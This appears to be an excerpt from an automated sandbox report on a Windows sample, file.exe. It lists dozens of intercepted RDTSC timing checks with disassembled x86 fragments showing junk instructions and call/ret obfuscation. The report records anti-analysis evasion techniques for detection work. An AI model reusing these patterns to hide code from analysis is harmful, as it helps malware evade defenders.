Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC149 second address: EDC157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC157 second address: EDC15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC15B second address: EDC15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC291 second address: EDC295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC295 second address: EDC2B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F8C7D0F21C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F8C7D0F21C6h 0x00000013 pushad 0x00000014 popad 0x00000015 jc 00007F8C7D0F21C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC405 second address: EDC409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC409 second address: EDC419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jc 00007F8C7D0F21E5h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC704 second address: EDC745 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C7D0F0866h 0x00000008 jmp 00007F8C7D0F0878h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8C7D0F0879h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC745 second address: EDC762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21CCh 0x00000009 jo 00007F8C7D0F21C6h 0x0000000f jnp 00007F8C7D0F21C6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC89A second address: EDC8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C7D0F0866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCCC2 second address: EDCCCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCDDB second address: EDCDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F8C7D0F086Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCDF2 second address: EDCE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C7D0F21D7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCE12 second address: EDCE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCE16 second address: EDCE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCE1A second address: EDCE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8C7D0F0866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F8C7D0F0866h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDCE30 second address: EDCE34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD430 second address: EDD434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD434 second address: EDD455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C7D0F21D4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD455 second address: EDD461 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD461 second address: EDD46B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD46B second address: EDD46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD5DD second address: EDD606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 je 00007F8C7D0F21C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C7D0F21D9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD606 second address: EDD60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD782 second address: EDD786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDDBEE second address: EDDBF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE4A3E second address: EE4A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnc 00007F8C7D0F21C6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9DC3 second address: EA9DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0873h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9DDB second address: EA9DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9DE1 second address: EA9E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e pushad 0x0000000f jo 00007F8C7D0F0866h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F8C7D0F086Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEACE3 second address: EEACE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA16D second address: EEA171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA171 second address: EEA17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA17D second address: EEA194 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F8C7D0F0866h 0x0000000f jg 00007F8C7D0F0866h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA2EE second address: EEA315 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C7D0F21CBh 0x00000013 jmp 00007F8C7D0F21CEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA47F second address: EEA48B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F8C7D0F0866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA8BF second address: EEA8CD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA8CD second address: EEA8DF instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8C7D0F0866h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA8DF second address: EEA8E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C7D0F21C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB3F8 second address: EEB402 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB48F second address: EEB495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB495 second address: EEB499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB499 second address: EEB4B3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F8C7D0F21C8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB4B3 second address: EEB4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F8C7D0F0878h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8C7D0F0876h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB4FF second address: EEB505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB505 second address: EEB53D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F8C7D0F0868h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 movsx edi, si 0x0000002a push D54A0F88h 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push edx 0x00000033 pop edx 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB8C3 second address: EEB8E9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C7D0F21CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C7D0F21D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB96E second address: EEB973 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC057 second address: EEC05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC05B second address: EEC061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC061 second address: EEC074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F21CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC665 second address: EEC6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnc 00007F8C7D0F087Eh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F8C7D0F0868h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F8C7D0F0870h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC6BF second address: EEC6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC6D7 second address: EEC6E1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C7D0F086Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EECBBB second address: EECBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F8C7D0F21CCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEF168 second address: EEF16D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEEE7B second address: EEEE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEFA27 second address: EEFA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF03E1 second address: EF040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0E73 second address: EF0E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEFA2B second address: EEFA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1B74 second address: EF1B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F086Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F8C7D0F0866h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEFA31 second address: EEFA4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jo 00007F8C7D0F21C6h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF51CB second address: EF51DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F086Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF62B7 second address: EF62BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5367 second address: EF5375 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF62BC second address: EF62C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF62C1 second address: EF6332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C7D0F0866h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007F8C7D0F086Dh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F8C7D0F0868h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F8C7D0F0868h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+1244F67Ch] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 pushad 0x00000058 popad 0x00000059 pop ecx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF754A second address: EF754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA3B0 second address: EFA3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA3B4 second address: EFA3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA3BF second address: EFA3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F8C7D0F086Ch 0x00000010 jo 00007F8C7D0F0866h 0x00000016 jmp 00007F8C7D0F086Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA3DF second address: EFA3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F8C7D0F21C6h 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F8C7D0F21C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAD630 second address: EAD65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jl 00007F8C7D0F0866h 0x0000000c jo 00007F8C7D0F0866h 0x00000012 pop ecx 0x00000013 jmp 00007F8C7D0F0874h 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA960 second address: EFA9F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8C7D0F21D0h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F8C7D0F21C8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007F8C7D0F21D8h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F8C7D0F21C8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a jmp 00007F8C7D0F21D3h 0x0000004f push 00000000h 0x00000051 add edi, dword ptr [ebp+122D36CFh] 0x00000057 mov edi, edx 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c jbe 00007F8C7D0F21C8h 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFAC41 second address: EFAC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F028BB second address: F02906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F8C7D0F21C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 xor edi, dword ptr [ebp+1244FC46h] 0x0000002a push 00000000h 0x0000002c sub edi, 5373208Eh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F8C7D0F21D4h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F049F5 second address: F049F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F05B2B second address: F05B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F05B30 second address: F05B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F05B36 second address: F05BC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop esi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F8C7D0F21C8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1834h], eax 0x00000034 push 00000000h 0x00000036 jno 00007F8C7D0F21D2h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F8C7D0F21C8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007F8C7D0F21D0h 0x00000061 jmp 00007F8C7D0F21CBh 0x00000066 popad 0x00000067 rdtsc
